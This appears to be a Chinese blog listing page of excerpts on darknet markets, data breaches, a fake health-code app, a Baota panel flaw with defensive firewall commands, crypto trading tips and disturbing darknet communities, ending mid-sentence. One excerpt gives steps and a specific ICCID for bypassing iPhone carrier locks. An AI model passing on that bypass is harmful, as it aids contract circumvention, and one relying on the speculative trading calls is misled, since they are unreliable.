该APP已下架 1月11日，有网友爆料称，在某应用软件商店中，一款名为“健康码演示”的软件能够根据个人所需随意显示各地健康码，涉嫌违法。 记者注意到，“健康码演示”APP显示，这款APP能够模拟各地健康码、复工码、通行码的不同演示风格。功能上，该APP不仅能够展示不同健康码，还可展示绿码、黄码、橙码、红码状态，并可自定义显示数据，如地区、城市、姓名等。记者注意到，该APP还标注了“注意事项”：称该应用仅作为演示目的，二维码并非实际健康码、复工码，请勿用于被扫码的场合，以免引起不必要误会。 这款APP被网友曝光后引发质疑，很多网友认为如果利用这款应用提供虚假的展示健康码，一旦感染新冠肺炎，相关防疫部门将难以追踪到患者准确轨迹，不利于疫情防控。 应用商店显示，这款APP开发者名为“Morrowind Xie”，其地址为杭州市上城区岳王路某科技公司。 12日，上城区市场监督管理局一位工作人员告诉记者，通过该地址查询不到公司，初步推断可能是个体行为或伪造地址。该工作人员表示，如果警方需要市场监督部门配合，他们会积极配合协助警方调查。12日，该应用已从应用商店下架。 12日，记者从上城区公安分局获悉，目前杭州市公安局已介入调查此事。 律师解读： 制作者和使用者都可能被定罪 万商天勤（上海）律师事务所律师芮苓向新闻晨报·021视频 解读，若情节严重，软件制作者将构成刑法上的妨碍传染病防治罪，而如果是黄码或红码持有者故意使用该软件生成绿码，可能面临更严厉的罪名。 ...

就在上周末，由德国牵头，联合澳大利亚、丹麦、摩尔多瓦、乌克兰、英国和美国的执法机构进行了一次国际行动。将暗网上全球最大的黑市DarkMarket推倒下线。 DarkMarket可以说是目前暗网上最大的交易市场，里面充斥的各种犯罪分子，是这些人的一个重要的聚集点。他们主要在这里进行各种毒品的买卖，假币，被盗或伪造的信用卡，匿名的SIM卡和恶意软件等等。 警方在德国奥尔登堡市逮捕了一名34岁的澳大利亚国民，据称是DarkMarket的经营者。 该男子一直在德国与丹麦接壤的边界附近进行作业，警方还在摩尔多瓦和乌克兰抓获了用于DarkMarket的20多台服务器。 警方对该男子进行了逮捕和对DarkMarket的服务器进行关闭和没收。截止关闭时暗网中与MarkMarket有关的数据还是挺吓人的： 近50万用户注册； 2400多个卖家； 超过32万笔交易； 超过4650个比特币和12800个门罗币的交易流水； 按照当先的汇率计算，总交易额超过1.4亿欧元。 警方仍在继续调查中，会对DarkMarket的经营者进行审讯和对服务器中保存的有关卖家和买家的数据进行分析。...

2021年1月初，有黑客在暗网发布消息称，已经掌握交行1679万条用户信息，贩卖价格为8.8枚比特币，甚至还留下了部分数据样本，显示为部分交行用户的借记卡号、姓名、家庭住址、开户分支行等信息。 按照目前比特币的价格，黑客索要金额约为220万元人民币左右。 这样的“数据裸奔”现象引起了社会关注，在该消息在互联网传播的同时，交通银行1月11日下午在官微发布声明称，经系统核查比对，确认所谓交行客户信息与该行真实客户信息不符。 交行称，不存在黑客入侵，不存在客户信息泄漏。该行已就相关违法行为向公安部门报案，依法追究损害该行商誉行为的法律责任。 交通银行表示，我行始终高度重视数据安全保护工作，通过部署多层次网络安全纵深防御措施，切实保障客户信息安全。我行将积极配合相关部门严厉打击伪造贩卖公民信息、恶意造谣扰乱金融秩序的不法行为。 这已经不是第一次黑客“盗卖”银行客户信息。 2020年4月，疑似国内多家银行等金融机构的数百万条客户数据在境外黑客论坛RAID FORUMS上被出售，其中包括客户手机号、姓名、身份证号和联系地址等信息。 例如，上述论坛上一位用户出售农业银行的客户信息，信息量超90万条，初次报价为3999美元，第二次发布时贩卖价格为2500美元；上述论坛上另一位用户出售的信息则涉及多家机构，包括80万余条上海银行用户信息、40万余条兴业银行信用卡用户信息、10万条浦发银行用户数据，以及招商银行数据等。 其中，浦发银行、上海银行的数据大多涉及客户手机号、姓名、性别、身份证号、联系地址等。 相关银行和金融机构均就此事给出了官方回应：经核查网传所述客户信息，与所在机构客户真实信息要素并不匹配。不排除是拼凑、伪造、出售所谓的客户信息。农业银行还回应称，目前已向监管部门报告有关情况，并准备向公安机关报案。 而在此前，银保监会发布的《银行业金融机构数据治理指引》也特别提到，银行业金融机构采集、应用数据涉及到个人信息的，应遵循国家个人信息保护法律法规要求，符合与个人信息安全相关的国家标准。 2018年11月，央行曾披露了一起银行泄露个人信息案例，池州九华农村商业银行因泄露个人信用报告信息和违规操作，被罚款22万元，负有直接责任的高管被罚款2万元。 2019年8月，中信银行因为“未向监管部门报告重要信息系统运营中断事件”和“信息系统控制存在较大安全漏洞，未做到有效的安全控制”，被央行处以2223.7万元罚款。此外，一些银行业机构违规泄露客户信息的员工，不仅遭终身禁业，还受到了法律的惩罚。 ...

援引外媒 ZDNet 报道，印度支付处理公司 Juspay 超过 1 亿用户的借记卡、信用卡信息在暗网上销售。Juspay 主要为亚马逊、Swiggy、MakeMyTrip 等公司处理支付业务。 本次泄漏的数据是以数据转储（data dump）的形式，从一个被入侵的 Juspay 服务器中泄漏的。Juspay 已经在其官方博客中确认了此次数据泄露事件，并概述了此次泄露事件的细节。 在官方博客中写道：“我们很痛心地通知您，2020 年 8 月 18 日确实发生了一起数据泄露事件。我们部分用户的非敏感掩码卡信息、手机号码和电子邮件 ID 被泄露”。 网络安全研究人员 Rajshekhar Rajaharia 发现了数据泄露。他发现，数据转储可以在暗网上出售。Rajaharia 对 Business Insider 表示，如果黑客弄清楚用于散列卡号的加密算法，这次数据泄露可能会更严重。 按照 Juspay 的说法，泄露的信息包括非敏感的掩码卡信息、手机号和部分用户的邮箱ID。该公司表示，泄露的信息不包括完整的卡号、订单信息、卡的PIN码或密码。Rajaharia 指出，如果用于哈希卡号的算法被泄露，或者黑客自己弄清楚，可能会给用户带来重大风险。 除了上述风险外，Rajaharia还指出，诈骗者可能会利用这次数据泄露来欺骗持卡人。由于泄露的数据包括手机号码，他们可以打电话给毫无戒备的持卡人，骗取他们透露完整的卡号、PIN、CVV以及一次性密码。 ...

著名的暗网市场——白宫市场(White House Market)已经放弃了比特币支付，现在只接受monero（XMR）。暗网市场管理员详细说明了支付处理器阻塞Tor出口节点的问题，但完全过渡到XMR的计划一直在计划中。 一些加密货币的支持者已经报道了暗网市场，“白宫市场”放弃了比特币(BTC)支付，只为支持monero (XMR)。12月28日，一位Twitter用户写道:“(最大的)暗网市场之一——“白宫市场”(White House Market)放弃了对比特币的支持，现在只使用monero。” News.Bitcoin.com通过访问白宫市场的洋葱网址证实了支付系统的改变。白宫管理人员详细说明了由第三方服务引发的比特币(BTC)支持问题。 “比特币支付不再被接受，”白宫管理层强调。“我们使用的(第三方)交换API (Morphtoken)突然决定阻止Tor出口节点的访问，虽然这对绕过来说微不足道，但我们决定尊重他们的决定。” 暗网管理员表示: “比特币的解决方案应该只是为了帮助过渡到XMR，正如我们所担心的那样，它已经完成了，因此我们现在只接受XMR，正如计划的那样。” 1000x Group DNM dashboard的数据显示，2020年12月29日，36.5%的DNM供应商接受monero提供的商品和服务。 Monero (XMR)是一种专注于隐私的加密货币资产，于2014年发布，它利用了开源加密协议。XMR的支持者喜欢XMR的隐私特性，比如秘密地址、环签名、bulletproof和dandelion++。 此外，monero还获得了无形网络上无数暗网市场(DNM)的支持。1000x集团(1000x Group)的darknet支付dashboard统计数据显示，“白宫市场”是唯一一个只能与XMR交易的DNM。 然而，除了比特币、莱特币和Zcash等加密资产外，许多市场也接受XMR支付。这包括DNMs如Darkbay, Cannazon, Darkmarket, Torrez Market, Cypher Market, Dark0de, Mega和Monopoly Market。大约有10个DNMs支持以隐私为中心的加密资产monero (XMR)用于支付。 数据显示，2020年12月29日，36.5%的DNM供应商接受门罗的商品和服务。 ...

...

一、什么是域名被墙？ 域名被墙是指域名被国家长城防火墙Great Firewall of China（简称GFW）屏蔽黑名单，导致域名无法访问的现象。 二、为何会被墙： 一般是使用香港或国外服务器，并且网站上有敏感违规关键词，导致GFW判断网站违规，将网站域名列入黑名单。 三、被墙后的现象： 域名被墙后的表现为：网站在国内无法访问，但在香港或国外却可以访问。 比如常见的google, facebook, youtube等国外网站，就是由于被墙后，国内无法访问。 四、域名被墙后如何解决 1.将域名备案后使用国内空间，不过使用国内空间后，可能在国外会无法访问到此网站。 2.更换一个新的域名，并查找网站违规内容或违规关键词，将违规内容和违规关键词删除。 ...

网站标题也就是我们俗说的网站title，在html的超文本标签中<title>对于网站的设计和seo搜索引擎的优化都是有着重大的意义，网站的标题决定着我们网站的流量和转化的多少，一个好的标题就是一个成功网站的第一步，如果第一步没有设立好，后面无论我们优化的再好，都不会对网站的流量和排名起到作用。 首先作为标题要简短，同时也要包含页面核心内容，表达文章的主旨，能给进入到网站里的用户给予有效的引导，吸引目标用户点击。 一个优秀的标题我们首先就需要考虑到关键词的流量，如果一个关键词没有流量没有用户搜索，那么即使网站网站布局再好，没有人去浏览还是没有用处的，我们需要用反向思维去考虑用户会搜索什么，用户的需求是什么？ 第二个要注意的就是网站的流量转换，任何一个产品类网站最重要的就是网站流量的转化，一个网站流量有了就要考虑到如何进行流量的转化，让流量购买我们的产品，首先我们要知道什么是流量关键词，如果我们是做服装的企业网站，那么流量转化词就是服装批发，服装设计，服装定制，搜索这类关键词的用户都是转化比较高的词，他们的需求就是购买服装这一类的，下面Kiein博客来介绍下网站标题的写法及注意事项。                                                1、网站标题书写方式 关键词1_关键词2_关键词3 - 品牌词 (中间符号可以根据个人喜好，但必须是英文状态符号) 关键词不要超过50个字符.关键词不要写的太多，因为每一个关键词都会占着你网站的权重，所以关键词越多就会越难参与排名，3到5个关键词是比较适宜的 2、网站关键词不能大量重复 每一个页面都要有不同的页面标题，不能为了节省时间，把所有页面的标题都设置为全部一样的，或者为了网站的排名去大量堆积重复的关键词，这样会导致网站的降权，而且全部一样的标题是不会参与搜索引擎的排名的，网站描述也是一样。如果我们的网站标签有这种情况，我们要尽快去修改，不然是没有办法去参与排名的 3、选择网站的核心词的区域性和需求 比如搬家公司，一般搬家的公司是地域性比较强的，一般用户都会搜索自己城市的搬家公司，所以我们如果是做地域性的网站，我们要把业务城市加到关键词上，如果网站是做全国的线上业务的，那可以不用考虑地区词。我们设置网站关键词的时候要考虑用户的搜索习惯考虑转换率，在百度指数中查看关键词的百度指数。在百度下拉和相关搜索中查看相关的长尾关键词进行，精准的选择长尾关键词。 4、关键词设立不要违法广告法 有些朋友设立网站关键词比较喜欢夸张，比如全球，第一 ，最强，首家，这类关键词都是违反广告法的我们不要去设置这种的关键词。如果网站被举报是会被罚款的，同时最好不要出现第三方的评价词，怎么样？好不好？ 那家好？这种的，我们最好放在站外去做，不然就是玩婆卖瓜自买自夸了。 5、关键词的顺序 首先我们需要把关键词个数与产品个数及相关性一起考虑，因为标题有几个关键词并不意味着网站有几个产品。在这之中多个关键词词可以描述一个产品，这样我们可以将网站内容布局成本控制到最低，减小关键词的竞争度。网站标题定位一定要清晰，关键词多的时候一定要考虑其相关性。标题关键词是从左至右依次类推，重要的关键词写在前边，之后的依次排序。 ...

宝塔面板Win/Linux又出现重大安全漏洞，究竟是道德的沦丧还是人性的扭曲！ 近日（其实也不是近日,这个漏洞很早就存在,这个漏洞暗网上卖5个BTC）白帽子发现了一个宝塔面板的漏洞，Windows、Linux版本的面板只要是安装过插件就可以无需密码直接提权进入面板后台！ 各位有使用宝塔面板的尽快关闭面板，关闭命令：bt stop，开启命令：bt start。 或者直接将面板的端口关闭外网访问 Firewall 关闭面板端口命令（8888为默认端口）：firewall-cmd --zone=public --remove-port=8888/tcp --permanent Firewall 开放面板端口命令（8888为默认端口）：firewall-cmd --zone=public --add-port=8888/tcp --permanent 使用命令后重启防火墙即可：systemctl restart firewalld 目前宝塔官方正在排查中，吃瓜地址：https://www.bt.cn/bbs/thread-61706-1-1.html ...

经常有人问我，是不是存在比暗网更深的网络，影子网络（马里亚纳网络）是否存在！ 坦白说，所谓的影子网络我是没有进过的，而且我也认为不存在所谓的影子网络，这一切不过是别人虚构出来的，以讹传讹。我承认，我也曾经相信它的存在，因为关于影子网络的传说实在是太多的，而且有些故事传非常逼真，神乎其神，甚至可以达到以假乱真的程度，再加上看了暗网上那些毛骨悚然的网站，我也曾经认为影子网络是存在的，但是当我更深入了解之后，我现在确信影子网络不过是子虚乌有，瞎编乱造的。话虽如此，其实除了洋葱网络之外，其实还有其他网络组成了所谓的“暗网”。术语“暗网”或多或少是一系列称为“暗网”的匿名网络的昵称。暗网是使用公共互联网但需要特殊软件，配置或访问许可的覆盖网络，Tor只是是其中最知名的一个。Tor Tor（洋葱浏览器）是一个匿名网络，它通过在世界各地的分布式中继网络中P2P通信来保护您的身份。因此，如果有人在使用Tor时尝试查看您的IP地址，它将显示为网络中其他节点或中继（本质上是其他计算机）的IP地址。除了使您能够以更大的匿名性浏览表层网络（例如Google，Facebook，Twitter）之外，Tor还具有所谓的“隐藏服务”；这些是TOR在服务器上的站点，这些站点配置通过Tor接收入站连接。其中一些网站以TOR非法或令人不安的内容而闻名，这是Tor享有声誉的原因之一。当人们讲述有关“深层网络”或“深色网络”的恐怖故事时，他们经常指的是Tor。其实说“使用洋葱网络”比“使用暗网”更为准确。I2P I2P是用于私有消息传递，电子邮件，聊天，博客和文件共享的覆盖网络和暗网。I2P还托管自己的隐藏服务网络，称为“ eepsites”，以域名“ .i2p”结尾。此外，I2P还因匿名洪流而闻名。它并不比洋葱网络更“深入”，尽管很多人是这么认为的，因为从技术上来说，设置和访问它可能会比使用tor更加复杂。配置成功之后，你可以在上面看到的路由器控制台中，配置网络和共享连接，以及访问一些知名的eepsite。Freenet 还有另一个匿名网络是Freenet，它虽然没有比前两个网络更“深入”，但是其功能却有所不同。Freenet是用于抗审查通信的对等平台。它将信息保存并存储在分布式数据存储中，该数据存储允许用户部署博客，共享文件和设置站点（称为“免费站点”）。它还具有称为“ Sone”的社交网络和称为“ Freenet Messaging System”或FMS的消息传递系统。Freenet还因为网络上的某些网站的内容令人不安而声名狼藉，其实Freenet的初衷是为了构建言论自由和未经审查的交流平台。GNUnet 和Freenet一样，GNUnet是用于抵抗审查的通信的免费软件框架。它还具有文件共享，站点托管和信任系统等功能。这几个网络中，其实Tor是最被人们所熟知的，I2P和Freenet次之，最后是GNUnet。 很多人认为暗网就是Tor网络，对其他网络知之甚少，其实这几个都只是暗网的一部分。总而言之，我认为所有这些网络都是所谓的“暗网”的一部分。他们只是功能不同，服务目的不同而已。 真正的影子网络并不存在...

据华强北商家消息，iPhone 12 系列黑解 iccid 已恢复，需要最新 iOS 14 及以上系统，全系支持 5G！超雪团队也表示，全系列有锁机可以 iccid 卡贴黑解了，解完可以免卡贴。以前卡贴激活的编辑 iccid 再次激活就可以，iPhone 12 选择 iccid 模式再次激活也能上车。 ICCID：89014104279605344555 按照以前的 iccid 解锁模式编辑即可。 IT之家获悉，iPhone 12 系列升级到 iOS 14 以上最新系统，插上卡贴加手机卡，会弹出菜单【换手机卡可再次弹菜单】 ，选 “ICCID 输入”，删掉默认的 ICCID 输入新码：89014104279605344555，点发送，点接受，后关机重启按机或者按出卡托再插进去。按提示完成激活即可！ ...

“我不是病毒”，我的头上没有皇冠。那不是皇冠，是刺突。是它侵袭人们的肺部，让人发烧、咳嗽、呼吸衰竭。。。 今天和大家分享一部电影叫做《一呼百应》，电影以新冠疫情下的武汉为背景，以主人公小吴的故事以及情感变化为主线，深层次描绘了，面对突如其来的疫情，我们的武汉人民，中国人民的奉献精神。 电影中包含了亲情、爱情、以及点滴中流露出来的家国情怀。 新冠疫情期间，面对武汉疫情，全国上下乃至全球都在行动，共同抗击新型冠状病毒的侵袭。然而在疫区的医护人员、病患、普通市民都在连日奋战。 我将电影进行了剪辑增加了旁白，将我认为触动的我内心的片段进行了串联，在此分享给大家。 据不完全统计，截至5月31日，全国参与疫情防控的注册志愿者达到881万人，志愿服务项目超过46万个，记录志愿服务时间超过2.9亿小时。 仅限此片献给最美逆行人——英勇战疫的白衣天使、大爱无疆的志愿者，献给每一位为守护美好家园而默默奉献的中国人。...

B站涉黄翻车，被相关部门约谈10次！ “B站看片，指日可待”相信经常逛B站的小伙伴都知道这句话，本以为是个玩笑话，不过最近看这事情的发展好像有些不对 小编每天在B站都是看鬼畜区，类似B站的音乐区和舞蹈区基本没怎么看过，所以说B站涉黄，让小编感觉到很惊讶，因为在小编眼里，B站一直是一个学习网站，每天都让我在知识的海洋里无法自拔！ 不过在微博看到消息后，小编也去其它区逛了逛，反正有很多地方都充斥着软色情   如果是正正经经跳舞和搞音乐是很少会有亮点的，所以为了博取关注，UP主都是穿着各种制服来挑战人类的视觉冲击   就连瑜伽也成了软色情关键词之一，还有什么“老司机专属” “病娇女友” “耳边吹气” 等等关键词，很难不让人歪想 一个干干净净的小破站，活生生被软色情搞的乌烟瘴气   近日，针对 B 站平台存在的某些内容涉色情低俗等较突出问题，上海市 “扫黄打非”办联合市委网信办、市文旅局对 B 站进行约谈，责令其限期整改2周，全面排查违法违规和不良信息，加强视频、直播内容、漫画、图文及相关弹幕和跟评的审核。   同时，明确要求，在验收网站整改工作合格前，暂停具有舆论属性或社会动员能力的新业务新功能的内测或上线。   2020年以来，全国“扫黄打非”办公室举报中心共接到群众反映B站问题的线索逾五百条。 按照转办线索，上海市相关部门对B站行政立案处罚6次，约谈10余次。   “扫黄打非”部门认为，对网络平台加强内容监管，不仅是对未成年人的保护、对网络空间秩序的维护，也是对互联网企业健康长远发展的呵护，要树立“严即是爱”“管就是帮”的理念。   就以内容取胜、年轻用户为主的B站来讲，内容安全比流量更重要，理应把好内容审核关。对于“年轻人的社区，监管就应该放宽一点”等错误认识，要坚决予以纠正并警钟长鸣。 ...

支付宝调整部分年轻用户花呗额度 你降额了吗？ 据财联社报道，近期，不少老铁反馈，自己的花呗额度被降到了2000元或3000元以下。 这些被调额的老铁们大多是年轻网友。蚂蚁集团回复称，花呗近期正在调整部分年轻用户的额度，倡导更理性的消费习惯。 如果您想知道自己是不是被降额，或降低了多少额度，可以在支付宝中查询。 打开支付宝App 点击花呗-我的额度 即可查看到自己的额度 然后点击总额度 额度变化记录中可查看近期花呗额度变化 中国人民银行数据显示，截至 2020 年 6 月 30 日，中国全国信用卡逾期半年未偿信贷总额已飙升至 854 亿元人民币，是 10 年前的 10 倍多，这些逾期借款人中，“90 后”几乎占了一半。 那么小伙伴们，你们的额度降了吗？也不知道咋回事，小编的反正是一直在涨...

最近有些老玩家被比特币的涨幅吸引回归，但是这2年又诞生了很多新币种，他们进来后很懵。  今天就给大家普及一下币圈的基础知识 远古时代，币圈有两大门派，POW党和POS党。POW一般都是比特神教，否认POS的价值，认为POS等于诈骗。POS党则主打环保皮牌、创新牌。 现在回头来看，POW党错了，但是由于坚信POW，POW党拿住了比特币，他们并没有输。 POS党对了，但也有很多人深陷一些不靠谱的POS币，反倒亏了。 创新是如此艰难，即便你看对了方向，也未必能因此成功，因此赚到。回头来看，反倒不如那些憨憨的POW党过得潇洒。 现在币圈已经很少人再提POW和POS了。因为基本上所有人都认可了POS的价值。 新事物总要有个接受的过程。币圈在完成POW共识后，现在又基本完成了POS共识。 所以现在去看币种，就不要纠结POW还是POS了。 一、公链竞争，接近尾声 我们一般说三大公链（ETH、EOS、TRX），实际上根本没有什么三大。公链的格局是一超多弱。 一超是指ETH，多弱包括EOS、TRX，还有些NEO、VET、ONT、BTM等。目前来看，没有能超越ETH的公链。其他公链在可以预见的未来只能跟着ETH吃点牛市的残羹冷炙。如果这头牛足够大，那么多出的肉也会很多，其实也能吃个饱。 为什么其他公链没有机会，有人说是因为它们的革命性不够强，只是在ETH的基础上修修补补。有革命性的公链，还是要看跨链。  二、跨链——下一代公链 跨链是个什么玩意，很多人想弄懂，但是实在不好理解。 一般说跨链，我们会说DOT、ATOM和IRIS。 但它们还没有具体的产品可以体验，基本只能从白皮书上的描叙去想象它们的未来。 有人说它们是面向未来的公链，性能强劲，还能实现资产跨链无感传输。比如USDT，你不用管是在哪条链上发行的，通过DOT，可以直接随意转账，自动转换。 即便如此，跨链依然是难于理解的，其应用场景到底是什么？ 不过，难于理解并不一定是坏事。EOS刚出来的时候也难于理解，这样才能拉到最高180元，等大家都理解了，直接给它砸到18元。 有个成语叫“黔驴技穷”。从前黔地一带没有毛驴，有一个好事者从北方运来一头毛驴放到山脚下吃草，山上的老虎发现了这个怪物，开始只有远远的望着，然后慢慢地靠近毛驴，被毛驴大叫吓了一跳，最后发现毛驴只能用蹄踢，再也没有别的本事就跳上去饱餐一顿。 三、DEFI——公链上的应用 公链大家之所以能看懂，是因为上面的确有应用。有去中心化交易所，可以抵押贷款，可以存币理财，可以做市挖矿。这些都有实际的产品可以去体验，多玩几天就能理解其意义和价值了。或许跨链的意义是，这些应用以后可以搬过去。比如ETH上的产品可以整体“搬迁”到DOT上去。但是，看到“搬迁”这个字我就抓狂，因为EOS刚出来的时候，他们也告诉我，以后ETH上的产品都会搬迁到EOS上面去。 ETH上的去中心化交易所，以UNI和SUSHI最为有名。ETH上的抵押型稳定币，首推DAI。ETH上抵押借贷产品，主要有AAVE、COMP。ETH上面的机枪池，最近被盗得厉害，不过YFI和YFII等其实还活得不错。EOS上的DEFI产品，比较活跃的有DFS、BOX、PIZZA等。 四、稳定币——不可忽视的势力 稳定币刚出来的时候，其实大家都不太看好。这东西价格稳定，又不能炒作，我持有它们干什么?要不是交易所充值不方便，谁会冒着风险去用稳定币。但是随着币圈生态的完善，稳定币的可玩性越来越强。在DEFI挖矿热潮中，稳定币无损挖矿，爽歪歪；做市挖矿，收益很高。尤其是现在，市场上还出现了可以炒作的稳定币，比如AMPL。币圈需要稳定币，让大家不再纠结于法币的充值提现。币圈甚至需要原生的稳定币，让币圈与原来的金融系统脱钩。就像比特币刚诞生的时候，清风同学高呼“比特币是互联网货币，互联网货币让互联网与实体经济脱钩”一样。为什么要脱钩，因为它们本来就自成体系，脱了钩，才能尽情狂奔。 五、存储币——雷声大雨点小 存储币的野心很大，它们想构建的是去中心化的互联网。这个野心太大了，而且也没有具体的方向。到底是哪些东西要存在去中心化的网络中？它们要取代是是亚马逊云服务、阿里云服务吗？去中心化的网络吞吐量如何，效率如何？据说存储币的龙头FIL已经可以用了，但是具体的落地推广，还没看到动静。去中心化存储的可靠性至少还需要5-10年的时间来验证，至少你不能把我存的东西弄丢了。FIL目前还在纠结于挖矿和激励。构建去中心化的互联网，现在看来还是一个梦想。 六、匿名币——苦苦挣扎 匿名币曾经火过，也是前10的常客。匿名币的需求其实并没有那么强烈，因为比特币也不是实名的。只有在一些阴暗的角落，需要极度匿名，甚至隐去转账记录的地方，匿名币才有一点生存空间。其实在我看来，匿名作为一个功能，其实没有必要单独做一个币，匿名功能可以集成到现有的主流币中。匿名板块的活跃币种主要有：XMR、DASH、ZEC、ZEN。  七：老币们哪去了BTS、NXT、狗狗币、点点币 曾经市值前10的老将们，大多都凋零了。狗狗币还算坚挺，市值还有26亿元。 BTS一分为二，分成了老比特股BTS和新比特股NBS。2个币市值加起来只有几亿。NXT一分为二，分成了新币阿朵ARDR和NXT。2个币市值加起来也只有几亿。点点币最惨，市值只有4000多万了，而且基本上没人再提起了。  “曾经我也相信一个网站之所以垮台是因为内容，一个明星之所以过气是因为不努力、不漂亮、没演技、没情商……后来看得多了，发现，无非是风口变了，而他们还停留在原地。”...

一，币圈行情这几天一直回调做多，币本位相对来说增加了不少，目前比特币又来到23800刀的高位，日线收阳，看起来有机会大突破了，但是考虑到下午交割时间就到了，有机会出现大的变动，多空比目前1.02。 其次是从4小时线来看有机会再出现一波下跌，所以目前我平掉了大部分多单，持有现货待涨，回调就继续撸币，给自己一个进退的空间，满仓做多最怕的就是下杀出现大幅度回撤影响心态，其实感觉这一次极有可能突破，但是考虑到低风险交易原则，只能暂时规避了。类似于币圈赵子龙肥宅这种狠人，如果不是跑得快，也爆仓多少次了。但是大多数人的心态都会因为巨额亏损的时候而不愿意止损，肥宅一千多万都能割的轻轻松松，这样的心境是不一样的。 现在持币待涨，切勿做空。前几次回调不做多，现在已经不是好的入场机会了，接下来的机会只有等放量大突破再说了。 币圈小机会很多，大机会不多，摈弃大量短线机会，拥抱大趋势，一年做几次交易就够了，今年10500刀到3800刀，3800刀到24000刀，两波机会把握住基本上后面几年囤币的钱就够了，反之日内几轮超短线，很有可能让自己迷惑其中，看不到即将发生的大行情和转变。 二，关于瑞波瑞波目前除USDT以外算是主流币里面排名第三的币种，成交量和深度是足够的，这样的一类老币在交易所里面属于大肉，传闻瑞波会被各个交易所下架，有点儿空谈了，今天又放量暴涨，就说明类似于媒体放出来的割韭菜消息。 万卉 Coinbase要下架XRP肯定是大概率事件，没人想搞砸自己的IPO… Coinbase的股东更不会允许这种临门一脚掉链子的事儿发生。毕竟IPO也归SEC管是不是，这不是无脑站队吗 ？ Coinbase下架对于XRP的影响不会特别大，本身就是国外的一个交易所，然后瑞波这类的老牌主流币基本上都类似于柚子是国人自己在坐庄，只要国内几家主流币等交易所不下架，基本上问题就不会特别大。 本身就自带杠杆的主流币，再上杠杆本身就是自讨苦吃，一天波动30%个点，管你几倍杠杆都会被爆，做多做空需谨慎，放量反弹以后，日线连续几天站稳可以考虑接点现货，做确定性机会，不要妄图抓住币圈没一个波动和每一个机会。 瑞波爆仓自讨苦吃，赌徒。 三，未来现货有机会接低价筹码吗？ 币圈就是什么事都有可能发生，所以才充满了投机性和神秘性，市值第三的币种都有可能一天腰斩50%。比特币突然跌破2万刀也不是没有可能。 1万多刀的时候也没人想过回到千刀级别阿，未来两个月如果没有机会接低价筹码，或许就没有机会了，接下来就是长牛的开启。 年底各个机构要做结算，为明年的发展做铺垫，所以年底业绩都不会做的太好，比特币有可能突破一轮新高上冲以后开启一波比较大的持续性回调，杀一杀多头杠杆，当然只是猜测。 到了这个节骨眼上，没必要再上杠杆抓高收益了，突破也就2，3千刀空间。毛毛近段时间波段流已经囤好了一部分币，不想再为了后面的行情丢掉了往日辛苦积累的筹码。 活下来，比赚钱更重要！ 四，文末提示 但是未来，如果比特币实现全球流通，市值本身的放大，价格就会变得更加稳定，就不会被这么轻易操纵，既有机会充当价值存储的角色。那么就有机会跟黄金对标，因为跟黄金相比，比特币的优势更加明显。 当前比特币的价格增长主要还是依靠共识增长。 比特币有这个机会吗？答案是有的。币圈这个地方很小，但是比特币这个生态其实是很大的。BTC 聪明的地方我认为是，如果经济不好，资金会有机会流入到BTC 中避险，要的人多价格就会涨。 按目前的体量，很少很少的资金已经可以实现这个涨幅。例如经济衰退时，美国债券哪怕利率再低，都有人买，黄金市场会获得追捧，日元会受压，因为投资者没有套利空间。 不再借日元去投资美元资产套利如果经济好，继续靠印钞去维持这个“繁荣”，同样依靠商品的属性获利。那时候，BTC 的发展空间小，是因为世界不再有任何争端，资源已经足够满足大家的需要。...

你可能已经知道互联网上有也写一些邪恶的社区（比如“您好，4chan”）。然而，一些更加邪恶和基于利基市场的社区存在于黑暗网中，不幸的是，比特币，色情和许多性别歧视在这里占据了上风，今天就给大家介绍几个暗网社区 4chan的“ / b /”论坛 论坛4chan是连接到2014名人裸照链接的网站，该论坛拥有一个仅称为/ b /的子论坛。该站点上的两个板之一，另一个称为/ a /，专门用于动漫讨论，“ / b /”论坛专用于“随机”内容，发布者通常将随机定义为“可怕”。尽管论坛禁止了儿童色情制品，但大多数其他活动仍然可以自由进行，包括暴力色情制品，鼓励种族主义和厌女症的帖子以及死者的照片。甚至有人指控/ b /组织 对批评留言板内容的人进行现实生活的骚扰。对于/ b /论坛尤其令人不安的是，它允许完全匿名，这一功能无意间引起了黑客主义者氏族Anonymous的注意。要加入4chan，用户不需要提供电子邮件地址。在/ b /论坛上，对话不会被存档，而是 随着新内容的到达而被删除。这有助于隐藏任何骚扰和非法活动的证据。尽管在线匿名性具有其自身的优点，但/ b /使得这种论证更加难以追溯。 滥交论坛 滥交是一种令人不安的行为，在这种情况下，男人在性交时偷偷取出避孕套。如果您想对人性失去信心，请在一个隐身论坛上花几分钟。在这些在线社区中，男性张贴者强烈宣称他们享有不受保护的性行为的权利。一些海报甚至声称，如果妇女因偷情而怀孕，那是她们自己的错，应该得到。 暗杀市场 在暗网中，一些最常搜索的话题与雇用杀手或刺客来消灭个人敌人甚至公众人物有关。最令人震惊的例子之一是暗杀市场，有人将其描述为谋杀的Kickstarter。用户将其目标名称添加到市场花名册中。然后其他用户通过比特币向谋杀基金捐款。做出关于受害者何时死亡的预测，做出最接近的预测的幸运者会带回大量的比特币作为奖励。该网站的创建者认为这种做法没有多大错。在该网站的常见问题解答上的一条声明中，他写道：“在大多数情况下，杀人是错误的，是的。但是，由于这是技术发展的必然方向，因此我宁愿将它视为自己手中，也不愿将其视为他人。通过廉价，准确地提供它，我希望更多不道德的选择不会带来足够的利润或信任。这首先应该是一种报应的工具。”由于创始人显然具有某种良心，因此用户无法为提供堕胎服务的医生或为制作可怕音乐的音乐家而声名狼藉。用他的话说，热门歌曲必须带有“充分的理由”。 食人者论坛 是的，没错–论坛是复数形式。从戈尔（Al Gore）发明互联网的那一刻起，网络就举办了多个论坛，专为食人者寻找其他食人者而设计。在最臭名昭著的是食人咖啡厅。在这里，用户寻求人们见面，以达成自愿的食人行为。通常，一个人同意让另一位愿意的参与者吃掉自己的身体。因为社区无处不在，所以成员还要求提供有关烹饪和准备人肉的建议。在一个令人不寒而栗的案例中，食人餐厅上的一张海报杀死并吃了另一个男人，现在这个网站已经被政府关闭了，万网上有一个存档版本 如果您在网上潜伏了足够长的时间，今天仍然有一些食人者论坛，有趣的是，他们不容忍冒犯性的话。 可爱的死家伙 这个论坛专门分享可爱的年轻人的照片和视频，这些年轻人恰好已经死了，Cute Dead 